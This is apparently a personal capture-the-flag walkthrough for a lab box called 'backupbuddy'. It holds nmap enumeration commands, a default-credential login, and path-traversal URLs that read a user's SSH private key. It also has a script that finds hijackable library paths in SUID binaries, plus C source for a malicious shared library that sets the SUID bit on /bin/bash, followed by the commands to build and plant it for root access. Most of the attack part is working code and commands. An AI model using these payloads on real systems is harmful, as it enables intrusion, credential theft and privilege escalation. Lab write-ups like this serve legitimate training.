Enum
# $IP is the target; -oN writes normal (human-readable) output to the named file
sudo nmap -T4 -A -v -oN nmap --min-rate 1000 $IP
sudo nmap -T4 --script=vuln -v -oN vuln --min-rate 1000 $IP
sudo nmap -T4 -A -v -p- -oN alltcp --min-rate 1000 $IP
sudo nmap -A -v -p- -oN alltcpslow $IP
echo "-----------------------------------------------------"
echo "TCP is done, starting UDP (slowwwwww)"
echo "-----------------------------------------------------"
sudo nmap -T4 -sU -A -vv -p- -oN udp --min-rate 1000 $IP
Services:
Discovered open port 22/tcp on 192.168.211.43
Discovered open port 80/tcp on 192.168.211.43
80
php file manager
default creds worked
fm_admin:fm_admin
User discovered
brian
let's test this
nah
?p=
The p= URL parameter looks like it can be tampered with (path traversal).
We can reach any directory with this; try it on any odd-looking dir:
http://192.168.211.43/index.php?p=../../../../
We can grab brian's SSH key (traversal into his .ssh dir, then view= the file):
http://192.168.211.43/index.php?p=..%2F..%2F..%2F..%2F%2Fhome%2Fbrian%2F.ssh
http://192.168.211.43/index.php?p=..%2F..%2F..%2F..%2F%2Fhome%2Fbrian%2F.ssh&view=id_rsa
ssh in as brian with that key (save it locally and chmod 600 it first, or ssh refuses it)
eugene (brian_key)
local
95b098a3954f7249706164e07e198a32
priv esc
SUID binary "backup"
/opt/backup
brian@backupbuddy:/opt$ ./backup
Starting backup ...
Aborting. Backup Error!
Let's watch it
well that didn't help
ah but it's running sometimes
eh
RUN STRINGS ON BINS YOU DON'T KNOW
Starting backup ...
/home/brian/.config/libm.so
Aborting. Backup Error!
Backup successful!
It's loading a library from /home/brian/.config!
That folder doesn't exist, and since it lives under brian's own home we can create it and supply the library ourselves.
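The "run strings on binaries you don't know" step, turned into a repeatable check. This is an added example, not part of the original notes or of the backup binary: it pulls every absolute *.so path embedded in a file with grep -a (so it works even where binutils' strings is missing) and reports whether the current user could put a file there, either because the directory is writable or because, as with /home/brian/.config here, it does not exist yet but its nearest existing ancestor is writable. It deliberately never runs ldd on the target, since ldd can end up executing an untrusted binary. The fake binary in the usage comment is constructed; on the box you would point check_bin at /opt/backup.

```shell
#!/bin/bash
# Added example (not from the original notes): find hardcoded library paths
# in a binary and flag the ones we could plant a file at.
# Assumes the binary embeds absolute .so paths (as /opt/backup does with
# /home/brian/.config/libm.so); absolute RPATH/RUNPATH or NEEDED entries
# are picked up the same way.

# Every absolute *.so path in the file, one per line, deduplicated.
lib_paths() {
    grep -aoE '/[A-Za-z0-9_./-]+\.so(\.[0-9]+)*' "$1" | sort -u
}

# Verdict for one path, printed as "VERDICT /path":
#   WRITABLE_FILE          we can overwrite the library itself
#   WRITABLE_DIR           directory exists and we can drop a file in it
#   MISSING_DIR_CREATABLE  directory is missing, but mkdir -p would succeed
#   MISSING_DIR            directory is missing and we cannot create it
#   LOCKED                 exists, not ours to touch
classify() {
    local p="$1" d a
    d=$(dirname "$p")
    if [ -w "$p" ]; then
        echo "WRITABLE_FILE $p"
    elif [ -d "$d" ] && [ -w "$d" ]; then
        echo "WRITABLE_DIR $p"
    elif [ ! -e "$d" ]; then
        a="$d"
        # walk up to the nearest ancestor that exists; if we can write it, mkdir -p works
        while [ ! -e "$a" ]; do a=$(dirname "$a"); done
        if [ -w "$a" ]; then
            echo "MISSING_DIR_CREATABLE $p"
        else
            echo "MISSING_DIR $p"
        fi
    else
        echo "LOCKED $p"
    fi
}

# Print a verdict for each library path in the binary; exit 0 if any is hijackable.
check_bin() {
    local hit=1 p v
    for p in $(lib_paths "$1"); do
        v=$(classify "$p")
        echo "$v"
        case "$v" in WRITABLE_*|MISSING_DIR_CREATABLE*) hit=0 ;; esac
    done
    return $hit
}

# Usage on the box: check_bin /opt/backup
# Constructed offline sample: a file holding "/home/me/.config/libm.so" where
# /home/me exists and is ours, but .config does not -> MISSING_DIR_CREATABLE
```

A MISSING_DIR_CREATABLE or WRITABLE_DIR hit against a SUID binary is exactly the /opt/backup situation: build the .so, mkdir -p the directory, drop the file, run the binary.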
Let's make our own library:
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>   /* setuid/setgid */

/* Runs when /opt/backup loads /home/brian/.config/libm.so. Built with
   -nostartfiles so our _init replaces the crt one. The binary is SUID root,
   so the effective uid is already 0; setuid(0) makes the real uid 0 too. */
void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    /* sudo is redundant once we are uid 0, but this is what was run */
    system("sudo chmod +s /bin/bash");
}

gcc -fPIC -shared -o libm.so t.c -nostartfiles
mkdir -p /home/brian/.config && cp libm.so /home/brian/.config/libm.so
/opt/backup
WORKED, LET'S GOOOOO
bash -p
that's root
proof.txt
75492d89c149df5216bcf155861a0bab